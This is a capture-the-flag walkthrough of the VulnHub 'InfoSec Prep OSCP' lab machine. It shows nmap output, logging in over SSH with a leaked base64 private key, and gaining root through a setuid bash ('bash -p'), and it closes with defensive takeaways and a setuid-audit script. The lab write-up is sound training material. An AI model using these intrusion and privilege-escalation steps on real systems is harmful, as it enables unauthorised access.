I did this box for the OSCP voucher giveaway back in July. I had to wait until the contest was over. I was not one of the lucky winners. :'( Good experience nonetheless.

[Screenshots: Vulnhub InfoSec Prep OSCP submission; InfoSec Prep OSCP flag submission]

Scanning and Enumeration

The first step is always an nmap scan. This scan was hella fast, which saved me the time of enumerating directories with Gobuster:

sudo nmap -sV -sC -T4 10.0.2.4
(out)Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-18 11:07 EDT
(out)Nmap scan report for 10.0.2.4
(out)Host is up (0.23s latency).
(out)Not shown: 998 closed ports
(out)PORT    STATE  SERVICE  VERSION
(out)22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
(out)80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
(out)|_http-generator: WordPress 5.4.2
(out)| http-robots.txt: 1 disallowed entry
(out)|_/secret.txt
(out)|_http-server-header: Apache/2.4.41 (Ubuntu)
(out)|_http-title: OSCP Voucher – Just another WordPress site
(out)Nmap done: 1 IP address (1 host up) scanned in 6.08 seconds

Gaining access via SSH

Since the scan came back so fast, I didn't even have a chance to look for a robots.txt file, which would have been my first move after starting a Gobuster scan. The nmap scan shows that robots.txt disallows a secret.txt file.

I downloaded and opened the secret.txt file; it's base64. At first I thought it was a certificate missing the header and footer lines. I tried adding those and SSHing, but it didn't work, so I decoded the base64 and it turned out to be an SSH private key, which I then used to SSH in. I guessed the oscp user because that is the user that appeared on the VM's login screen. I did try root@ first, which did not work:

base64 -d secret.txt > key
chmod 600 key
ssh -i key oscp@10.0.2.4

Post Exploit

Enumerating for Privilege Escalation

Once I'm on the box I run id and see that I'm the user oscp, not root.

id
(out)uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)

Next I check for access to:

  • /root directory. Nope not so lucky.
  • /home directory. There is one directory for a user named oscp.

I checked out the contents of /home/oscp and found an ip file. It was owned by root, so I thought it might be run by a cron job, but that didn't pan out. If there was something there, I missed it.

ls -la /home/oscp
(out)-rwxr-xr-x 1  root root    88 Jul 18 11:04  ip

Next I downloaded my favorite Linux enumeration script, Linux Smart Enumeration. Sometimes you have to serve it from a Python web server on your own machine, but this time the box could fetch it directly from GitHub.

wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh

I gave the script execute permission and ran it. The output is enormous, so I'm only including what immediately stuck out to me and ended up being the answer:

chmod +x lse.sh
./lse.sh
(out)[!] fst020 Uncommon setuid binaries........................................ yes!
(out)---
(out)/usr/bin/bash

Getting Root Flag

Once I see setuid binaries, I head over to GTFOBins.

I didn't have a password and could not use sudo, so I tried:

sh -c 'cp $(which bash) .; chmod +s ./bash'
./bash -p

I was still unprivileged oscp. :(

After re-reading the GTFOBins note, which I should have done in the first place ("To exploit an existing SUID binary skip the first command and run the program using its original path"), I tried:

/usr/bin/bash -p
id
(out)uid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp)

I'm root!

ls /root
(out)fix-wordpress  flag.txt  snap
cat /root/flag.txt

Takeaways

Attacker

  • If you find a base64 try decoding it before trying anything else with it.
  • Read the details for exploits you are using, don't just start copying and pasting stuff without understanding.

Victim

  • Make sure no binary carries a setuid bit it shouldn't have.
  • Don't leave SSH keys exposed.
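The fst020 finding from lse.sh and the first Victim takeaway come down to one check: is any shell or interpreter setuid root? As an added example (not from the original writeup), the POSIX sh script below audits a filesystem tree for setuid binaries and sorts them into dangerous, unknown and expected; the allowlist is a constructed, abbreviated baseline, and the labels, function names and optional OWNER argument are my own.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit a tree for setuid
# binaries, the class of finding lse.sh reported as fst020 (/usr/bin/bash).
# Assumption: POSIX sh plus find/sort/grep; the allowlist below is a
# constructed, abbreviated baseline, not an authoritative Ubuntu list.

# Shells and interpreters that must never be setuid root: run with -p they
# keep euid 0, which is exactly what "/usr/bin/bash -p" did in the writeup.
DANGEROUS_SUID="bash sh dash zsh ksh python python3 perl ruby"

# Constructed allowlist of binaries that are setuid on a stock install.
KNOWN_OK="sudo su passwd chsh chfn gpasswd newgrp mount umount pkexec"

# in_list NAME "word word ..." -> exit 0 if NAME is one of the words
in_list() {
  for w in $2; do [ "$1" = "$w" ] && return 0; done
  return 1
}

# audit_suid ROOT [OWNER]   (OWNER defaults to root)
# Prints one line per setuid file owned by OWNER under ROOT:
#   DANGEROUS <path>   shell/interpreter with setuid; fix with chmod u-s
#   UNKNOWN   <path>   not in the allowlist, review by hand
#   OK        <path>   expected setuid binary
audit_suid() {
  find "$1" -xdev -type f -user "${2:-root}" -perm -4000 2>/dev/null | sort |
  while IFS= read -r f; do
    name=${f##*/}
    if in_list "$name" "$DANGEROUS_SUID"; then echo "DANGEROUS $f"
    elif in_list "$name" "$KNOWN_OK";     then echo "OK $f"
    else                                        echo "UNKNOWN $f"
    fi
  done
}

# suid_dangerous_count ROOT [OWNER] -> number of DANGEROUS entries
suid_dangerous_count() {
  audit_suid "$1" "${2:-root}" | grep -c '^DANGEROUS ' || true
}

# Usage: sh suid_audit.sh /   (non-zero exit if any DANGEROUS entry exists)
if [ $# -ge 1 ]; then
  audit_suid "$1"
  [ "$(suid_dangerous_count "$1")" -eq 0 ]
fi
```

On this box `sh suid_audit.sh /` would flag /usr/bin/bash as DANGEROUS, and `chmod u-s /usr/bin/bash` clears the finding.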

Invaluable Tools

Try the VulnHub Infosec Prep OSCP box